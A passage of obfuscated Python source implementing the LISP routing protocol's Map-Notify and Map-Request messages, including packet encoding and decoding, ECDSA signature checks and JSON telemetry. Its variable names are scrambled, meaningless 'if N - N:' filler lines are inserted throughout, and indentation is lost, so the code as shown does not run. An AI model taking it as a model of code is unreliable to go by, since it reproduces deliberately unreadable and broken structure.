"{}{}{}, auth-len: {}, auth-data: {}" )
lprint ( oOOo0ooO0 . format ( bold ( "Map-Notify-Ack" , False ) if self . map_notify_ack else bold ( "Map-Notify" , False ) ,
# OOooOOo - Ii1I + II111iiii / I11i - I1Ii111
self . record_count , lisp_hex_string ( self . nonce ) , self . key_id ,
self . alg_id , " (sha1)" if ( self . key_id == LISP_SHA_1_96_ALG_ID ) else ( " (sha2)" if ( self . key_id == LISP_SHA_256_128_ALG_ID ) else "" ) , self . auth_len , oooO ) )
if 49 - 49: Ii1I + OoooooooOO . O0 . i11iIiiIii
if 54 - 54: OOooOOo . I1ii11iIi11i * I11i % I1Ii111 . O0 * IiII
if 87 - 87: Ii1I % I1ii11iIi11i * Oo0Ooo
if 59 - 59: Oo0Ooo / I11i - iIii1I11I1II1 * iIii1I11I1II1
def zero_auth ( self , packet ) :
if ( self . alg_id == LISP_NONE_ALG_ID ) : return ( packet )
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
oooO = struct . pack ( "QQI" , 0 , 0 , 0 )
if 18 - 18: I11i * I1ii11iIi11i / i11iIiiIii / iIii1I11I1II1 * OoooooooOO . OOooOOo
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
oooO = struct . pack ( "QQQQ" , 0 , 0 , 0 , 0 )
if 69 - 69: Oo0Ooo * ooOoO0o
packet += oooO
return ( packet )
if 91 - 91: o0oOOo0O0Ooo . ooOoO0o / OoO0O00 / i11iIiiIii * o0oOOo0O0Ooo
if 52 - 52: I1IiiI - i11iIiiIii / IiII . oO0o
def encode ( self , eid_records , password ) :
if ( self . map_notify_ack ) :
iII = ( LISP_MAP_NOTIFY_ACK << 28 ) | self . record_count
else :
iII = ( LISP_MAP_NOTIFY << 28 ) | self . record_count
if 38 - 38: oO0o + OoooooooOO * OoOoOO00 % oO0o
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( iII ) )
IiiiIi1iiii11 += struct . pack ( "QBBH" , self . nonce , self . key_id , self . alg_id ,
socket . htons ( self . auth_len ) )
if 91 - 91: i1IIi - I1ii11iIi11i * I1IiiI
if ( self . alg_id == LISP_NONE_ALG_ID ) :
self . packet = IiiiIi1iiii11 + eid_records
return ( self . packet )
if 24 - 24: OoOoOO00 * Ii1I
if 17 - 17: OoO0O00 . I1IiiI * O0
if 81 - 81: OOooOOo
if 58 - 58: II111iiii . I1Ii111 . Ii1I * OoooooooOO / Ii1I / I11i
if 41 - 41: I11i + OoO0O00 . iII111i
IiiiIi1iiii11 = self . zero_auth ( IiiiIi1iiii11 )
IiiiIi1iiii11 += eid_records
if 73 - 73: i11iIiiIii * I1IiiI + o0oOOo0O0Ooo / oO0o
IIi1iiIIi1i = lisp_hash_me ( IiiiIi1iiii11 , self . alg_id , password , False )
if 56 - 56: i1IIi
OoO00oo00 = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
II111iiI1Ii1 = self . auth_len
self . auth_data = IIi1iiIIi1i
IiiiIi1iiii11 = IiiiIi1iiii11 [ 0 : OoO00oo00 ] + IIi1iiIIi1i + IiiiIi1iiii11 [ OoO00oo00 + II111iiI1Ii1 : : ]
self . packet = IiiiIi1iiii11
return ( IiiiIi1iiii11 )
if 11 - 11: i11iIiiIii % o0oOOo0O0Ooo / I11i * OoooooooOO
if 82 - 82: IiII
def decode ( self , packet ) :
OoO = packet
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 10 - 10: Oo0Ooo % OOooOOo / I11i * IiII - o0oOOo0O0Ooo
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
iII = socket . ntohl ( iII [ 0 ] )
self . map_notify_ack = ( ( iII >> 28 ) == LISP_MAP_NOTIFY_ACK )
self . record_count = iII & 0xff
packet = packet [ Iiiii : : ]
if 54 - 54: i11iIiiIii / iIii1I11I1II1 % I1ii11iIi11i / I1IiiI . iIii1I11I1II1 / iII111i
i1I1iii1I11II = "QBBH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 1 - 1: I1Ii111 / OoOoOO00 * OoOoOO00 - o0oOOo0O0Ooo % Ii1I
self . nonce , self . key_id , self . alg_id , self . auth_len = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 96 - 96: IiII / Ii1I % OoO0O00 . iIii1I11I1II1
self . nonce_key = lisp_hex_string ( self . nonce )
self . auth_len = socket . ntohs ( self . auth_len )
packet = packet [ Iiiii : : ]
self . eid_records = packet [ self . auth_len : : ]
if 30 - 30: I11i - OoO0O00
if ( self . auth_len == 0 ) : return ( self . eid_records )
if 15 - 15: OoooooooOO
if 31 - 31: II111iiii
if 62 - 62: iIii1I11I1II1 % I1Ii111 % I1ii11iIi11i * IiII
if 87 - 87: IiII
if ( len ( packet ) < self . auth_len ) : return ( None )
if 45 - 45: oO0o + II111iiii * O0 % OOooOOo . iIii1I11I1II1
II111iiI1Ii1 = self . auth_len
if ( self . alg_id == LISP_SHA_1_96_ALG_ID ) :
I1IiiIiIIi1Ii , oo00oo , OOOO0oO0OOo0o = struct . unpack ( "QQI" , packet [ : II111iiI1Ii1 ] )
OoOO = ""
if 55 - 55: IiII
if ( self . alg_id == LISP_SHA_256_128_ALG_ID ) :
I1IiiIiIIi1Ii , oo00oo , OOOO0oO0OOo0o , OoOO = struct . unpack ( "QQQQ" ,
packet [ : II111iiI1Ii1 ] )
if 43 - 43: OOooOOo
self . auth_data = lisp_concat_auth_data ( self . alg_id , I1IiiIiIIi1Ii , oo00oo ,
OOOO0oO0OOo0o , OoOO )
if 17 - 17: i11iIiiIii
Iiiii = struct . calcsize ( "I" ) + struct . calcsize ( "QHH" )
packet = self . zero_auth ( OoO [ : Iiiii ] )
Iiiii += II111iiI1Ii1
packet += OoO [ Iiiii : : ]
return ( packet )
if 94 - 94: OoooooooOO - IiII + oO0o . OoooooooOO / i1IIi
if 53 - 53: I1Ii111 % I1ii11iIi11i
if 17 - 17: OoooooooOO % Ii1I % O0
if 46 - 46: iII111i + I1Ii111 % OoooooooOO * I1ii11iIi11i
if 89 - 89: IiII - IiII % iII111i / I11i + oO0o - IiII
if 97 - 97: Ii1I % OoOoOO00 / I1ii11iIi11i / iIii1I11I1II1 * OoooooooOO * OOooOOo
if 80 - 80: oO0o / O0
if 55 - 55: I1IiiI * I11i / O0 % OoOoOO00
if 71 - 71: i11iIiiIii * OoOoOO00 * OOooOOo + oO0o + Oo0Ooo
if 59 - 59: IiII
if 54 - 54: OOooOOo
if 27 - 27: OoOoOO00 - OoO0O00 + o0oOOo0O0Ooo + ooOoO0o . OoO0O00
if 86 - 86: II111iiii - OoooooooOO - ooOoO0o % iII111i
if 16 - 16: ooOoO0o + Oo0Ooo + OoooooooOO
if 87 - 87: I1IiiI . oO0o / IiII - OoooooooOO
if 33 - 33: oO0o % OoO0O00 . iIii1I11I1II1 / IiII
if 3 - 3: Ii1I + OoO0O00
if 60 - 60: OoO0O00 . OoOoOO00 - I1ii11iIi11i - I1IiiI - II111iiii % Oo0Ooo
if 62 - 62: O0 + iII111i - iII111i % iIii1I11I1II1
if 47 - 47: I1Ii111 + I1IiiI
if 40 - 40: iIii1I11I1II1 % Ii1I + II111iiii - I1IiiI
if 80 - 80: oO0o
if 81 - 81: OoooooooOO / ooOoO0o * iIii1I11I1II1 . Oo0Ooo + oO0o / O0
if 84 - 84: II111iiii - o0oOOo0O0Ooo
if 78 - 78: IiII
if 58 - 58: i11iIiiIii - OoOoOO00
if 67 - 67: I1ii11iIi11i / iII111i + iIii1I11I1II1 % I1IiiI
if 99 - 99: ooOoO0o . Ii1I
if 92 - 92: i1IIi
if 68 - 68: OoO0O00 % IiII - oO0o - ooOoO0o . Oo0Ooo
if 30 - 30: OoooooooOO % o0oOOo0O0Ooo + ooOoO0o * OoO0O00
if 57 - 57: I11i + iIii1I11I1II1 . OoO0O00 + oO0o
if 4 - 4: Ii1I
if 43 - 43: i1IIi . I1IiiI * iIii1I11I1II1 * i11iIiiIii - OOooOOo + ooOoO0o
if 56 - 56: Oo0Ooo % i11iIiiIii / Ii1I . I1Ii111 . OoO0O00 - OoOoOO00
if 32 - 32: I1Ii111 / oO0o / I1IiiI
if 22 - 22: OoO0O00 - OoOoOO00 . Oo0Ooo + o0oOOo0O0Ooo
if 69 - 69: oO0o - I1IiiI
if 10 - 10: i1IIi / iII111i . II111iiii * i1IIi % OoooooooOO
if 83 - 83: I11i . OOooOOo + I1Ii111 * I11i . I1Ii111 + oO0o
if 64 - 64: Ii1I . o0oOOo0O0Ooo - i1IIi
if 35 - 35: I1ii11iIi11i % OoooooooOO
if 59 - 59: I1IiiI % I11i
if 32 - 32: I1IiiI * O0 + O0
if 34 - 34: IiII
if 5 - 5: OoO0O00 . I1IiiI
if 48 - 48: Oo0Ooo - OoO0O00 . I11i - iIii1I11I1II1 % Ii1I
if 47 - 47: iII111i / OoooooooOO - II111iiii
if 91 - 91: OoOoOO00 + o0oOOo0O0Ooo
if 23 - 23: i1IIi
class lisp_map_request ( ) :
def __init__ ( self ) :
self . auth_bit = False
self . map_data_present = False
self . rloc_probe = False
self . smr_bit = False
self . pitr_bit = False
self . smr_invoked_bit = False
self . mobile_node = False
self . xtr_id_present = False
self . local_xtr = False
self . dont_reply_bit = False
self . itr_rloc_count = 0
self . record_count = 0
self . nonce = 0
self . signature_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . itr_rlocs = [ ]
self . keys = None
self . privkey_filename = None
self . map_request_signature = None
self . subscribe_bit = False
self . xtr_id = None
self . json_telemetry = None
if 9 - 9: i1IIi % I1Ii111 - OoO0O00 * OoOoOO00 . o0oOOo0O0Ooo
if 18 - 18: Ii1I . OoOoOO00 + iII111i . I1IiiI + OoooooooOO . OoO0O00
def print_prefix ( self ) :
if ( self . target_group . is_null ( ) ) :
return ( green ( self . target_eid . print_prefix ( ) , False ) )
if 31 - 31: I1Ii111 - I11i
return ( green ( self . target_eid . print_sg ( self . target_group ) , False ) )
if 49 - 49: iIii1I11I1II1 - iIii1I11I1II1 - OoOoOO00 + IiII / OoOoOO00
if 74 - 74: OoooooooOO + I1ii11iIi11i % O0
def print_map_request ( self ) :
I1II = ""
if ( self . xtr_id != None and self . subscribe_bit ) :
I1II = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
if 32 - 32: I1ii11iIi11i + I1ii11iIi11i
if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
if 12 - 12: OoOoOO00 - o0oOOo0O0Ooo - I1Ii111 / I11i
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
if 17 - 17: OoO0O00 - I1Ii111 - II111iiii / I1Ii111 / Ii1I
lprint ( oOOo0ooO0 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
# I1Ii111 % OOooOOo
"D" if self . map_data_present else "d" ,
"R" if self . rloc_probe else "r" ,
"S" if self . smr_bit else "s" ,
"P" if self . pitr_bit else "p" ,
"I" if self . smr_invoked_bit else "i" ,
"M" if self . mobile_node else "m" ,
"X" if self . xtr_id_present else "x" ,
"L" if self . local_xtr else "l" ,
"D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
self . record_count , lisp_hex_string ( self . nonce ) ,
self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
" (with sig)" if self . map_request_signature != None else "" ,
self . target_eid . afi , green ( self . print_prefix ( ) , False ) , I1II ) )
if 73 - 73: I1ii11iIi11i + iII111i * I1IiiI * I11i
iIi11III = self . keys
for I11iiII1I1111 in self . itr_rlocs :
if ( I11iiII1I1111 . afi == LISP_AFI_LCAF and self . json_telemetry != None ) :
continue
if 30 - 30: I1Ii111 - O0 + I1IiiI . I1ii11iIi11i
I111iI1IIIi1I = red ( I11iiII1I1111 . print_address_no_iid ( ) , False )
lprint ( " itr-rloc: afi {} {}{}" . format ( I11iiII1I1111 . afi , I111iI1IIIi1I ,
"" if ( iIi11III == None ) else ", " + iIi11III [ 1 ] . print_keys ( ) ) )
iIi11III = None
if 21 - 21: iII111i % O0 . ooOoO0o / OoOoOO00
if ( self . json_telemetry != None ) :
lprint ( " itr-rloc: afi {} telemetry: {}" . format ( LISP_AFI_LCAF ,
self . json_telemetry ) )
if 54 - 54: I1ii11iIi11i * IiII
if 3 - 3: IiII - I1ii11iIi11i * iII111i * I1ii11iIi11i + Oo0Ooo
if 15 - 15: I1ii11iIi11i * Ii1I / iII111i . o0oOOo0O0Ooo / Ii1I % OoOoOO00
def sign_map_request ( self , privkey ) :
Oo0o0ooOo0 = self . signature_eid . print_address ( )
OoOoo0ooO0000 = self . source_eid . print_address ( )
ii1iiI11III1 = self . target_eid . print_address ( )
IIIiiI1I = lisp_hex_string ( self . nonce ) + OoOoo0ooO0000 + ii1iiI11III1
self . map_request_signature = privkey . sign ( IIIiiI1I )
O0OO0OoO00oOo = binascii . b2a_base64 ( self . map_request_signature )
O0OO0OoO00oOo = { "source-eid" : OoOoo0ooO0000 , "signature-eid" : Oo0o0ooOo0 ,
"signature" : O0OO0OoO00oOo }
return ( json . dumps ( O0OO0OoO00oOo ) )
if 35 - 35: II111iiii . OOooOOo + iIii1I11I1II1 . i1IIi - OoOoOO00 + IiII
if 55 - 55: Oo0Ooo % I1Ii111 . II111iiii
def verify_map_request_sig ( self , pubkey ) :
oo0Oo = green ( self . signature_eid . print_address ( ) , False )
if ( pubkey == None ) :
lprint ( "Public-key not found for signature-EID {}" . format ( oo0Oo ) )
return ( False )
if 11 - 11: I1Ii111 + i1IIi - iII111i - OoO0O00 * ooOoO0o / ooOoO0o
if 4 - 4: iIii1I11I1II1 - i11iIiiIii * OoO0O00 . I1Ii111 + o0oOOo0O0Ooo
OoOoo0ooO0000 = self . source_eid . print_address ( )
ii1iiI11III1 = self . target_eid . print_address ( )
IIIiiI1I = lisp_hex_string ( self . nonce ) + OoOoo0ooO0000 + ii1iiI11III1
pubkey = binascii . a2b_base64 ( pubkey )
if 11 - 11: OoOoOO00 % I1ii11iIi11i - Ii1I - I1Ii111
OO = True
try :
Oo000O000 = ecdsa . VerifyingKey . from_pem ( pubkey )
except :
lprint ( "Invalid public-key in mapping system for sig-eid {}" . format ( self . signature_eid . print_address_no_iid ( ) ) )
if 27 - 27: IiII * OOooOOo - OoooooooOO . Ii1I - II111iiii
OO = False
if 62 - 62: I1IiiI / iIii1I11I1II1 * I11i
if 84 - 84: IiII - OoOoOO00 . IiII + ooOoO0o . iII111i
if ( OO ) :
try :
OO = Oo000O000 . verify ( self . map_request_signature , IIIiiI1I )
except :
OO = False
if 96 - 96: Ii1I % iII111i * Ii1I % I1IiiI . o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 7 - 7: OoO0O00 - ooOoO0o % i1IIi
if 24 - 24: OoO0O00 % O0 % I11i
O0o = bold ( "passed" if OO else "failed" , False )
lprint ( "Signature verification {} for EID {}" . format ( O0o , oo0Oo ) )
return ( OO )
if 83 - 83: OoooooooOO * iIii1I11I1II1 . OoooooooOO / II111iiii . OoooooooOO - IiII
if 90 - 90: Oo0Ooo % i11iIiiIii + O0 % O0
def encode_json ( self , json_string ) :
iI1IIiI111iII = LISP_LCAF_JSON_TYPE
OoOoO00OoOOo = socket . htons ( LISP_AFI_LCAF )
oOOO0O000Oo = socket . htons ( len ( json_string ) + 2 )
iiiii1I = socket . htons ( len ( json_string ) )
IiiiIi1iiii11 = struct . pack ( "HBBBBHH" , OoOoO00OoOOo , 0 , 0 , iI1IIiI111iII , 0 , oOOO0O000Oo ,
iiiii1I )
IiiiIi1iiii11 += json_string
IiiiIi1iiii11 += struct . pack ( "H" , 0 )
return ( IiiiIi1iiii11 )
if 22 - 22: iII111i . OoooooooOO . Oo0Ooo
if 44 - 44: OoOoOO00 / Oo0Ooo . OoooooooOO % OoooooooOO * i11iIiiIii
def encode ( self , probe_dest , probe_port ) :
iII = ( LISP_MAP_REQUEST << 28 ) | self . record_count
if 60 - 60: IiII / iIii1I11I1II1 + OoooooooOO - I1ii11iIi11i * i11iIiiIii
Iii1iIIi1iIii = lisp_telemetry_configured ( ) if ( self . rloc_probe ) else None
if ( Iii1iIIi1iIii != None ) : self . itr_rloc_count += 1
iII = iII | ( self . itr_rloc_count << 8 )
if 55 - 55: o0oOOo0O0Ooo . OOooOOo * OoOoOO00
if ( self . auth_bit ) : iII |= 0x08000000
if ( self . map_data_present ) : iII |= 0x04000000
if ( self . rloc_probe ) : iII |= 0x02000000
if ( self . smr_bit ) : iII |= 0x01000000
if ( self . pitr_bit ) : iII |= 0x00800000
if ( self . smr_invoked_bit ) : iII |= 0x00400000
if ( self . mobile_node ) : iII |= 0x00200000
if ( self . xtr_id_present ) : iII |= 0x00100000
if ( self . local_xtr ) : iII |= 0x00004000
if ( self . dont_reply_bit ) : iII |= 0x00002000
if 19 - 19: iII111i
IiiiIi1iiii11 = struct . pack ( "I" , socket . htonl ( iII ) )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
if 32 - 32: I11i % ooOoO0o % OoooooooOO . ooOoO0o % i11iIiiIii + II111iiii
if 25 - 25: ooOoO0o
if 83 - 83: Ii1I / OoooooooOO * oO0o . I1IiiI . i1IIi
if 59 - 59: I11i . I11i * I1IiiI - Ii1I % OoOoOO00
if 19 - 19: OoooooooOO / Oo0Ooo - I1Ii111 . OoOoOO00
if 8 - 8: I11i % ooOoO0o . iIii1I11I1II1
OOoooO = False
I1i1II1i = self . privkey_filename
if ( I1i1II1i != None and os . path . exists ( I1i1II1i ) ) :
OOO000 = open ( I1i1II1i , "r" ) ; Oo000O000 = OOO000 . read ( ) ; OOO000 . close ( )
try :
Oo000O000 = ecdsa . SigningKey . from_pem ( Oo000O000 )
except :
return ( None )
if 13 - 13: I1Ii111 * II111iiii - OoOoOO00
II11iii = self . sign_map_request ( Oo000O000 )
OOoooO = True
elif ( self . map_request_signature != None ) :
O0OO0OoO00oOo = binascii . b2a_base64 ( self . map_request_signature )
II11iii = { "source-eid" : self . source_eid . print_address ( ) ,
"signature-eid" : self . signature_eid . print_address ( ) ,
"signature" : O0OO0OoO00oOo }
II11iii = json . dumps ( II11iii )
OOoooO = True
if 85 - 85: OoO0O00
if ( OOoooO ) :
IiiiIi1iiii11 += self . encode_json ( II11iii )
else :
if ( self . source_eid . instance_id != 0 ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IiiiIi1iiii11 += self . source_eid . lcaf_encode_iid ( )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( self . source_eid . afi ) )
IiiiIi1iiii11 += self . source_eid . pack_address ( )
if 5 - 5: Ii1I % Ii1I * I1Ii111
if 21 - 21: iIii1I11I1II1 % I1IiiI / o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 28 - 28: OoooooooOO . ooOoO0o / II111iiii + I11i / O0 . OoooooooOO
if 75 - 75: iIii1I11I1II1 * I1Ii111 . i11iIiiIii
if 21 - 21: i11iIiiIii . o0oOOo0O0Ooo
if 25 - 25: OoO0O00 % i1IIi
if 12 - 12: o0oOOo0O0Ooo
if ( probe_dest ) :
if ( probe_port == 0 ) : probe_port = LISP_DATA_PORT
oo0o00OO = probe_dest . print_address_no_iid ( ) + ":" + str ( probe_port )
if 58 - 58: iIii1I11I1II1 * Ii1I . ooOoO0o . Oo0Ooo * Ii1I
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
self . keys = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if 63 - 63: OoOoOO00 . I11i * o0oOOo0O0Ooo - I11i % I11i
if 62 - 62: I11i - ooOoO0o / ooOoO0o
if 95 - 95: OoOoOO00 - i1IIi / I1Ii111 . ooOoO0o % OOooOOo - i1IIi
if 12 - 12: iII111i
if 96 - 96: O0
if 89 - 89: I1ii11iIi11i - Oo0Ooo
if 26 - 26: ooOoO0o % ooOoO0o / II111iiii / iII111i
for I11iiII1I1111 in self . itr_rlocs :
if ( lisp_data_plane_security and self . itr_rlocs . index ( I11iiII1I1111 ) == 0 ) :
if ( self . keys == None or self . keys [ 1 ] == None ) :
iIi11III = lisp_keys ( 1 )
self . keys = [ None , iIi11III , None , None ]
if 2 - 2: i1IIi / i11iIiiIii + I1IiiI
iIi11III = self . keys [ 1 ]
iIi11III . add_key_by_nonce ( self . nonce )
IiiiIi1iiii11 += iIi11III . encode_lcaf ( I11iiII1I1111 )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( I11iiII1I1111 . afi ) )
IiiiIi1iiii11 += I11iiII1I1111 . pack_address ( )
if 95 - 95: I1ii11iIi11i / IiII % iIii1I11I1II1 + O0
if 6 - 6: IiII
if 73 - 73: o0oOOo0O0Ooo % o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i - Ii1I
if 97 - 97: IiII
if 15 - 15: O0 - I1IiiI / i1IIi . I1Ii111
if 64 - 64: ooOoO0o / i1IIi
if ( Iii1iIIi1iIii != None ) :
i1 = str ( time . time ( ) )
Iii1iIIi1iIii = lisp_encode_telemetry ( Iii1iIIi1iIii , io = i1 )
self . json_telemetry = Iii1iIIi1iIii
IiiiIi1iiii11 += self . encode_json ( Iii1iIIi1iIii )
if 100 - 100: II111iiii
if 16 - 16: Ii1I
OO00O = 0 if self . target_eid . is_binary ( ) == False else self . target_eid . mask_len
if 79 - 79: i11iIiiIii + IiII - i11iIiiIii . OoooooooOO + OoO0O00 . i11iIiiIii
if 9 - 9: OoOoOO00 - I11i . OoooooooOO % ooOoO0o
IIIiIiIIII1i1 = 0
if ( self . subscribe_bit ) :
IIIiIiIIII1i1 = 0x80
self . xtr_id_present = True
if ( self . xtr_id == None ) :
self . xtr_id = random . randint ( 0 , ( 2 ** 128 ) - 1 )
if 90 - 90: I1IiiI % ooOoO0o % OoooooooOO / OoO0O00 . IiII * II111iiii
if 83 - 83: oO0o
if 34 - 34: OoOoOO00
i1I1iii1I11II = "BB"
IiiiIi1iiii11 += struct . pack ( i1I1iii1I11II , IIIiIiIIII1i1 , OO00O )
if 75 - 75: I11i / iIii1I11I1II1 + I1ii11iIi11i / OoO0O00
if ( self . target_group . is_null ( ) == False ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IiiiIi1iiii11 += self . target_eid . lcaf_encode_sg ( self . target_group )
elif ( self . target_eid . instance_id != 0 or
self . target_eid . is_geo_prefix ( ) ) :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
IiiiIi1iiii11 += self . target_eid . lcaf_encode_iid ( )
else :
IiiiIi1iiii11 += struct . pack ( "H" , socket . htons ( self . target_eid . afi ) )
IiiiIi1iiii11 += self . target_eid . pack_address ( )
if 50 - 50: I1Ii111 / I11i % iIii1I11I1II1
if 46 - 46: ooOoO0o + iII111i - Oo0Ooo % OOooOOo + OoooooooOO + iIii1I11I1II1
if 99 - 99: OoO0O00 - IiII * IiII + oO0o / iII111i + OOooOOo
if 58 - 58: i11iIiiIii + iIii1I11I1II1 * o0oOOo0O0Ooo - OoOoOO00
if 31 - 31: i1IIi
if ( self . subscribe_bit ) : IiiiIi1iiii11 = self . encode_xtr_id ( IiiiIi1iiii11 )
return ( IiiiIi1iiii11 )
if 87 - 87: I1IiiI / I11i + OoooooooOO + O0 . Ii1I
if 44 - 44: Oo0Ooo % Oo0Ooo
def lcaf_decode_json ( self , packet ) :
i1I1iii1I11II = "BBBBHH"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 58 - 58: OOooOOo * II111iiii
Ii1IiIIIi1i , II111Ii1I1I , iI1IIiI111iII , o00oo0oOo0o0 , oOOO0O000Oo , iiiii1I = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 12 - 12: I11i / i11iIiiIii - I1Ii111
if 50 - 50: I11i
if ( iI1IIiI111iII != LISP_LCAF_JSON_TYPE ) : return ( packet )
if 88 - 88: i1IIi * OOooOOo . iIii1I11I1II1
if 45 - 45: I1Ii111 - O0 . I1Ii111 / I1Ii111 / OoOoOO00
if 12 - 12: OOooOOo
if 75 - 75: OOooOOo + Ii1I + oO0o . Oo0Ooo
oOOO0O000Oo = socket . ntohs ( oOOO0O000Oo )
iiiii1I = socket . ntohs ( iiiii1I )
packet = packet [ Iiiii : : ]
if ( len ( packet ) < oOOO0O000Oo ) : return ( None )
if ( oOOO0O000Oo != iiiii1I + 2 ) : return ( None )
if 93 - 93: OOooOOo * Ii1I - o0oOOo0O0Ooo . oO0o . iII111i
if 64 - 64: Oo0Ooo / iIii1I11I1II1 . OoO0O00 / o0oOOo0O0Ooo / I11i
if 3 - 3: OOooOOo - o0oOOo0O0Ooo * iIii1I11I1II1 . Ii1I + OoOoOO00 % I1Ii111
if 11 - 11: OOooOOo
II11iii = packet [ 0 : iiiii1I ]
packet = packet [ iiiii1I : : ]
if 12 - 12: OoooooooOO * OOooOOo * I1ii11iIi11i * ooOoO0o
if 26 - 26: OoooooooOO . i1IIi + OoO0O00
if 42 - 42: i11iIiiIii * o0oOOo0O0Ooo % I11i % Oo0Ooo + o0oOOo0O0Ooo * i11iIiiIii
if 66 - 66: Ii1I / IiII . OoooooooOO * Oo0Ooo % i11iIiiIii
if ( lisp_is_json_telemetry ( II11iii ) != None ) :
self . json_telemetry = II11iii
if 100 - 100: I1ii11iIi11i % II111iiii * i11iIiiIii - iII111i
if 69 - 69: OOooOOo + iII111i / I1Ii111
if 37 - 37: iIii1I11I1II1 * I11i / IiII * Oo0Ooo % i11iIiiIii
if 93 - 93: ooOoO0o + ooOoO0o
if 65 - 65: OoooooooOO * I11i * oO0o % I1ii11iIi11i * II111iiii
i1I1iii1I11II = "H"
Iiiii = struct . calcsize ( i1I1iii1I11II )
O0ooo0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if ( O0ooo0 != 0 ) : return ( packet )
if 86 - 86: i11iIiiIii / I11i * iII111i - iII111i
if ( self . json_telemetry != None ) : return ( packet )
if 32 - 32: Oo0Ooo . O0
if 48 - 48: I1ii11iIi11i % II111iiii + I11i
if 25 - 25: IiII * o0oOOo0O0Ooo / I1IiiI . IiII % II111iiii
if 50 - 50: OoOoOO00 * iII111i
try :
II11iii = json . loads ( II11iii )
except :
return ( None )
if 59 - 59: I1IiiI * I1IiiI / I11i
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: iII111i + I1ii11iIi11i . Ii1I
if 50 - 50: Oo0Ooo
if 16 - 16: Ii1I - OoOoOO00 % Oo0Ooo / Ii1I . I11i + ooOoO0o
if ( II11iii . has_key ( "source-eid" ) == False ) : return ( packet )
ooOOoo0 = II11iii [ "source-eid" ]
O0ooo0 = LISP_AFI_IPV4 if ooOOoo0 . count ( "." ) == 3 else LISP_AFI_IPV6 if ooOOoo0 . count ( ":" ) == 7 else None
if 47 - 47: Ii1I % ooOoO0o + Ii1I
if ( O0ooo0 == None ) :
lprint ( "Bad JSON 'source-eid' value: {}" . format ( ooOOoo0 ) )
return ( None )
if 49 - 49: OoOoOO00 / i1IIi / OoooooooOO . iII111i + iII111i
if 51 - 51: OoooooooOO + i11iIiiIii
self . source_eid . afi = O0ooo0
self . source_eid . store_address ( ooOOoo0 )
if 57 - 57: Oo0Ooo % o0oOOo0O0Ooo
if ( II11iii . has_key ( "signature-eid" ) == False ) : return ( packet )
ooOOoo0 = II11iii [ "signature-eid" ]
if ( ooOOoo0 . count ( ":" ) != 7 ) :
lprint ( "Bad JSON 'signature-eid' value: {}" . format ( ooOOoo0 ) )
return ( None )
if 99 - 99: o0oOOo0O0Ooo / i11iIiiIii / II111iiii + OOooOOo . i1IIi + OoOoOO00
if 7 - 7: I1IiiI / ooOoO0o % OoO0O00 + oO0o . o0oOOo0O0Ooo / I11i
self . signature_eid . afi = LISP_AFI_IPV6
self . signature_eid . store_address ( ooOOoo0 )
if 84 - 84: OOooOOo + II111iiii . o0oOOo0O0Ooo * Oo0Ooo
if ( II11iii . has_key ( "signature" ) == False ) : return ( packet )
O0OO0OoO00oOo = binascii . a2b_base64 ( II11iii [ "signature" ] )
self . map_request_signature = O0OO0OoO00oOo
return ( packet )
if 68 - 68: Ii1I % Ii1I
if 26 - 26: o0oOOo0O0Ooo . Ii1I * OoOoOO00
def decode ( self , packet , source , port ) :
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 58 - 58: I1IiiI * OoO0O00 * i11iIiiIii / OOooOOo / I1IiiI
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
iII = iII [ 0 ]
packet = packet [ Iiiii : : ]
if 46 - 46: IiII - I1IiiI + OoO0O00 / I11i . i11iIiiIii
i1I1iii1I11II = "Q"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( None )
if 84 - 84: OoooooooOO . OoO0O00 / OoOoOO00 * i1IIi
Iii11I = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
packet = packet [ Iiiii : : ]
if 6 - 6: iIii1I11I1II1 * iIii1I11I1II1
iII = socket . ntohl ( iII )
